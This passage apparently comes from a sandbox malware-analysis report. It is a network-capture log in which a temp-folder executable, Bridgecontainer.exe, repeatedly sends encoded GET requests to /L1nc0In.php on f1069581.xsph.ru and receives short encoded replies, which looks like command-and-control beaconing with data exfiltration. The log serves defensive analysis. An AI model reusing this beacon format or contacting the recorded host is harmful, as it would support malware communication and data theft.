User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:18:21.116899014 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:18:21 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49991	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:18:26.137350082 CET	2233	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:18:26.821595907 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:18:26 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49992	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:18:31.840255022 CET	2206	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=d1nIiojI0EWZiVTYzATYmVWZlRjZlRWZwgzY4ITOhdTY3EWOmJmIsIiZ4MjZxIzNhBzYxgzN4cTOiN2M3YWNhNGMzUjM5YDOyAjZjFDN5cjNiojImdTNyEWO4EDO1gTM0AjZmNjM5MjN2YmNyUzM3UDM1MjIsIiNkZ2N4EjM0MmM3MDZkNTMmNTM4IGMkJmYhJDOlVjNzMjZ1UmYiFWZiojIxYWY5UmYjNDM5YTZzATZlV2M0czY0EWNhRjYxcjY4UmI7xSfiElZx8maJBjVzIGbxcVYVJEWaxGeyUVa3lWSuVzVhdnVXp1cOxWS2kUejFjUYlFMOZVZwwWbkBnUzklQKNETplUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslkNJNlW1lzRhdXOtNmasdFV6xWbJN [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:18:32.523602962 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:18:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49993	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:18:33.110641956 CET	827	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGOzMGOzATN4cDN4MjMiNzY2UGMzUGOxIiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W HTTP/1.1 Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:18:33.804224014 CET	158	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:18:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49994	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:18:33.813539028 CET	1452	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&154d77d402106dff3d2a63610a8c9212=d1nIw4WSzh3RSZnUuJGcS5mY2p1RkVnVtJmdChlY25URYNmQYJGbSZEWjh3VZpWOHR1Y4ZVWwY0RSdnQYF1Y4FzY1lTbaNnRHh1YO52Ys5EWWNGes9ERKl2Tpd2RkhmQsl0cJlmYzkTbiJXNXZVavpWSvJFWZFlUtNmdOJzYwJ1aJNXSplkNJNUYwY0RVRnRtNmbWdkYsJFbJNXSplkNJl3Y3JEWRRnRXpFMOxWSzlUaiNTOtJmc1clVp9maJVEbrNGbOhlV0Z0VaBjTsl0cJlmYzkTbiJXNXZVavpWS5ZlMjZVMXlFbSNTVpdXaJVHZzIWd01mYWpUaPl2YtJGa4VlYoZ1RkRlSDxUa0IDZ2VjMhVnVslkNJNUYwY0RVRnRXpFMOxWSzl0UZJTSXlFdBR0TyklaOBTQql1N1MlZ3FERNdXQE10dBpGT4RzQNVXQ6VWavpWS6ZVbiZHaHNmdKNTWwFzaJNXSplkNJl3Y0ZkMZlmVyYVa3lWS1hHbjNmRUdlQ4VUVUxWRSNGesx0Y4ZEWjpUaPlWTuJGbW12Yq5EbJNXS5tEN0MkTp9maJVXOXFmeKhlWXRXbjZHZYpFdG12YHpUelJiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiIlhDZlVTYlRDOyUzMmZWM2QGO [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:18:34.520953894 CET	158	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:18:34 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49995	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:18:37.547410965 CET	2233	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:18:38.231367111 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:18:38 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49996	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:18:43.247786045 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:18:43.971126080 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:18:43 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49997	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:18:48.996751070 CET	2257	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru Connection: Keep-Alive
Jan 2, 2025 05:18:49.680490017 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:18:49 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49998	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:18:54.700608015 CET	2233	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
Jan 2, 2025 05:18:55.375226021 CET	264	IN	HTTP/1.1 200 OK Server: openresty Date: Thu, 02 Jan 2025 04:18:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 5a 6c 52 47 5a 34 51 47 5a 34 59 32 4d 32 63 44 4f 7a 63 54 5a 31 59 57 4d 69 46 54 4e 6d 56 6d 59 34 6b 7a 4e 6c 5a 54 4f 34 49 79 65 36 49 79 59 7a 67 6a 5a 33 6b 7a 59 6b 46 54 4f 33 51 44 4d 35 6b 7a 59 68 56 7a 59 79 51 6a 59 7a 49 54 5a 34 49 7a 4e 34 51 32 4e 30 49 79 65 Data Ascii: ==Qf9JiI6IiZlRGZ4QGZ4Y2M2cDOzcTZ1YWMiFTNmVmY4kzNlZTO4Iye6IyYzgjZ3kzYkFTO3QDM5kzYhVzYyQjYzITZ4IzN4Q2N0Iye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49999	141.8.192.151	80	5688	C:\Users\user\AppData\Local\Temp\ComponentfontintoDll\Bridgecontainer.exe

Timestamp	Bytes transferred	Direction	Data
Jan 2, 2025 05:19:00.390961885 CET	2233	OUT	GET /L1nc0In.php?0wJqWIDeGKE5HMQaW9=bgMnNKcplpYN4rS0hE0df6QIvg3&NRe4zqCBoI6g4dbyr6KOyWs=ffVfPD2qQtbU&dYNpRMZ=UjCec&b59daed131a5b229758cb5fca4b11528=gM4UzMyMGNlZmMlRzNmVzMmFGZzMjM4EjNyATN0QGO2kDMiRzNmRDNwgjN4kzN2QDMzIjN1gjM&0ba6e725790744febcc21ebe8d80c3a7=QN4YDOzAzMhFWYiZTMwIzNhFWM5MjNlRmY5cTN2IWO1UTNmZWZmJGZ&70fd1f4e39497cfa4a2ef86106a65a1e=d1nImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZis3W&ce168cbd002dff8b283ef206741c0917=0VfiIiOiQTYlJWNhNDMhZWZlVGNmVGZlBDOjhjM5E2NhdTY5YmYiwiImhzMmFjM3EGMjFDO3gzN5I2YzcjZ1E2YwMTNykjN4IDMmNWM0kzN2IiOiY2N1ITY5gTM4UDOxQDMmZ2MykzM2YjZ2ITNzcTNwUzMiwiI2QmZ3gTMyQzYyczMkR2MxY2MxgjYwQmYiFmM4UWN2MzMmVTZiJWYlJiOiEjZhlTZiN2MwkjNlNDMlVWZzQzNjRTY1EGNiFzNihTZisHL9JSUmFzbqlEMWNjYsFzVhVlQYpFb4JTVpdXaJ5WNXF2dWdlWz5EbJZTS5NWMShVWw4kVlBDbtRGcSNTWCp0QMlWSYplbG1mYoFTRJRnRtNmb502YRpUaPl2YzI2a1cVYYJVMRJkSDxUa0sWS2k0UihmTtlFbkFzYwp0QMl2aslk [TRUNCATED] Accept: / Content-Type: text/html User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: f1069581.xsph.ru
